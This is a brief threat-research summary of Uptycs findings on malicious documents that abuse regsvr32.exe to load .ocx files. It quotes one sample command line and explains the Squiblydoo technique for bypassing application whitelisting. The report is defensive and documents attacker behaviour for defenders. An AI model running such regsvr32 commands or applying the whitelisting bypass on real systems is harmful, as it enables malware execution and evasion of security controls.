Researchers at Uptycs labs have documented an increase in regsvr32 execution via malicious documents in the recent months. The research team observed over 500 samples using regsvr32.exe to register .ocx files, using similar commands as the example below:
- regsvr32 -e -n -i:&Tiposa!G22& C:\\ProgramData\\Dotr4.ocx
Regsvr32 can be used for loading COM scriptlets to execute DLLs without making changes to the Registry as the COM object is not actually registered but executed. This technique is also known as the Squiblydoo technique allowing the bypass of application whitelisting.